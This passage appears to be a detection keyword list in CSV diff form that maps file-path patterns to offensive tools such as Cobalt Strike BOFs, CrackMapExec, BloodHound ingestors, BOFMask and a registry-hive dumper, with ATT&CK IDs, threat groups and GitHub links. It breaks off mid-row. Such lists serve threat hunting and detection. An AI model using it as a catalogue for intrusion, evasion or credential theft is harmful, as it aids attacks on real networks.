+"*/bloodhound.md*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*/bloodhound.py*","offensive_tool_keyword","crackmapexec","bloodhound integration with crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks ","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z"
+"*/bloodhound/enumeration*","offensive_tool_keyword","bloodhound","A Python based ingestor for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/fox-it/BloodHound.py","1","1","N/A","10","10","1539","268","2023-09-27T07:56:12Z","2018-02-26T14:44:20Z"
+"*/bloodhound_domain.py*","offensive_tool_keyword","bofhound","Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel","T1046 - T1087 - T1003","TA0007 - TA0009 - TA0001","N/A","N/A","Discovery","https://github.com/fortalice/bofhound","1","1","N/A","5","3","252","25","2023-09-21T23:23:07Z","2022-05-10T17:41:53Z"
+"*/bloodhound_domaintrust.py*","offensive_tool_keyword","bofhound","Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel","T1046 - T1087 - T1003","TA0007 - TA0009 - TA0001","N/A","N/A","Discovery","https://github.com/fortalice/bofhound","1","1","N/A","5","3","252","25","2023-09-21T23:23:07Z","2022-05-10T17:41:53Z"
+"*/bloodhound_gpo.py*","offensive_tool_keyword","bofhound","Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel","T1046 - T1087 - T1003","TA0007 - TA0009 - TA0001","N/A","N/A","Discovery","https://github.com/fortalice/bofhound","1","1","N/A","5","3","252","25","2023-09-21T23:23:07Z","2022-05-10T17:41:53Z"
+"*/bloodhound_object.py*","offensive_tool_keyword","bofhound","Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel","T1046 - T1087 - T1003","TA0007 - TA0009 - TA0001","N/A","N/A","Discovery","https://github.com/fortalice/bofhound","1","1","N/A","5","3","252","25","2023-09-21T23:23:07Z","2022-05-10T17:41:53Z" +"*/bloodhound_ou.py*","offensive_tool_keyword","bofhound","Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel","T1046 - T1087 - T1003","TA0007 - TA0009 - TA0001","N/A","N/A","Discovery","https://github.com/fortalice/bofhound","1","1","N/A","5","3","252","25","2023-09-21T23:23:07Z","2022-05-10T17:41:53Z" +"*/bloodhound_schema.py*","offensive_tool_keyword","bofhound","Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel","T1046 - T1087 - T1003","TA0007 - TA0009 - TA0001","N/A","N/A","Discovery","https://github.com/fortalice/bofhound","1","1","N/A","5","3","252","25","2023-09-21T23:23:07Z","2022-05-10T17:41:53Z" +"*/bloodhound-data*","offensive_tool_keyword","bloodhound","A Python based ingestor for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/fox-it/BloodHound.py","1","1","N/A","10","10","1539","268","2023-09-27T07:56:12Z","2018-02-26T14:44:20Z" +"*/bloodhound-quickwin.git*","offensive_tool_keyword","bloodhound-quickwin","Simple script to extract useful informations from the combo BloodHound + Neo4j","T1087 - T1087.001 - T1018 - T1069 - T1069.002","TA0007 - TA0003 - TA0004","N/A","N/A","AD Enumeration","https://github.com/kaluche/bloodhound-quickwin","1","1","N/A","6","2","162","17","2023-07-17T14:31:51Z","2021-02-16T16:04:16Z" +"*/bloodyAD.git*","offensive_tool_keyword","bloodyAD","BloodyAD is an Active Directory Privilege Escalation Framework","T1078.004 - T1059.003 - T1071.001","TA0004 - 
TA0002","N/A","N/A","Privilege Escalation","https://github.com/CravateRouge/bloodyAD","1","1","N/A","10","9","883","96","2023-10-04T14:38:56Z","2021-10-11T15:07:26Z" +"*/bluscreenofjeff/*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" +"*/Bo0oM*","offensive_tool_keyword","Github Username","Github username known for exploitation tools. Web application security researcher. Current Location: Moscow. 
Russia","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/Bo0oM","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/bof.cpp *","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","0","N/A","10","10","1581","306","2023-09-26T14:00:33Z","2020-07-22T09:45:52Z" +"*/bof.h","offensive_tool_keyword","cobaltstrike","Collection of beacon object files for use with Cobalt Strike to facilitate","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - 
T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rookuu/BOFs","1","0","N/A","10","10","156","26","2021-02-11T10:48:12Z","2021-02-11T10:28:48Z" +"*/BOF.NET/*","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","1","N/A","10","10","557","86","2023-08-13T13:24:00Z","2020-11-02T20:02:55Z" +"*/bof.nim","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF Files with Nim!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - 
T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/byt3bl33d3r/BOF-Nim","1","1","N/A","10","10","83","12","2022-07-10T22:12:10Z","2021-01-12T18:58:23Z" +"*/bof.x64.o*","offensive_tool_keyword","cobaltstrike","Information released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - 
CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nccgroup/nccfsas","1","1","N/A","10","10","594","117","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z" +"*/bof.x64.o*","offensive_tool_keyword","cobaltstrike","Spectrum Attack Simulation beacons","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nccgroup/nccfsas/","1","1","N/A","10","10","594","117","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z" +"*/bof.x86.o*","offensive_tool_keyword","cobaltstrike","Information released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - 
T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nccgroup/nccfsas","1","1","N/A","10","10","594","117","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z" +"*/bof.x86.o*","offensive_tool_keyword","cobaltstrike","Spectrum Attack Simulation beacons","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nccgroup/nccfsas/","1","1","N/A","10","10","594","117","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z" +"*/bof/bof.c","offensive_tool_keyword","cobaltstrike","Information released publicly by NCC Group's Full 
Spectrum Attack Simulation (FSAS) team","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nccgroup/nccfsas","1","1","N/A","10","10","594","117","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z" +"*/bof/bof.vcxproj*","offensive_tool_keyword","cobaltstrike","Information released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - 
TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nccgroup/nccfsas","1","1","N/A","10","10","594","117","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z" +"*/bof/IABOF*","offensive_tool_keyword","cobaltstrike","Inject .NET assemblies into an existing process","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/kyleavery/inject-assembly","1","1","N/A","10","10","449","75","2022-01-19T19:15:11Z","2022-01-03T15:38:10Z" +"*/bof/IAStart.asm*","offensive_tool_keyword","cobaltstrike","Inject .NET assemblies into an existing process","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - 
T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/kyleavery/inject-assembly","1","1","N/A","10","10","449","75","2022-01-19T19:15:11Z","2022-01-03T15:38:10Z" +"*/BOF-Builder*","offensive_tool_keyword","cobaltstrike","C# .Net 5.0 project to build BOF (Beacon Object Files) in mass","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/ceramicskate0/BOF-Builder","1","1","N/A","10","10","23","3","2023-07-25T22:19:27Z","2021-09-07T01:28:11Z" +"*/bof-collection/*","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files (BOF) for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/crypt0p3g/bof-collection","1","1","N/A","10","10","151","25","2022-12-05T04:49:33Z","2021-01-20T06:07:38Z" +"*/bofhound.git*","offensive_tool_keyword","bofhound","Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel","T1046 - T1087 - T1003","TA0007 - TA0009 - TA0001","N/A","N/A","Discovery","https://github.com/fortalice/bofhound","1","1","N/A","5","3","252","25","2023-09-21T23:23:07Z","2022-05-10T17:41:53Z" +"*/BOFMask.git*","offensive_tool_keyword","BOFMask","BOFMask is a proof-of-concept for masking Cobalt Strike's Beacon payload while executing a Beacon Object File (BOF)","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - 
TA0011","N/A","N/A","Defense Evasion","https://github.com/passthehashbrowns/BOFMask","1","1","N/A","10","1","94","24","2023-06-28T14:35:32Z","2023-06-27T21:19:22Z" +"*/bofmask.h*","offensive_tool_keyword","BOFMask","BOFMask is a proof-of-concept for masking Cobalt Strike's Beacon payload while executing a Beacon Object File (BOF)","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/passthehashbrowns/BOFMask","1","1","N/A","10","1","94","24","2023-06-28T14:35:32Z","2023-06-27T21:19:22Z" +"*/BOFNETExamples/*","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","1","N/A","10","10","557","86","2023-08-13T13:24:00Z","2020-11-02T20:02:55Z" +"*/BOF-RegSave*","offensive_tool_keyword","cobaltstrike","Dumping SAM / SECURITY / SYSTEM registry hives with a Beacon Object File","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - 
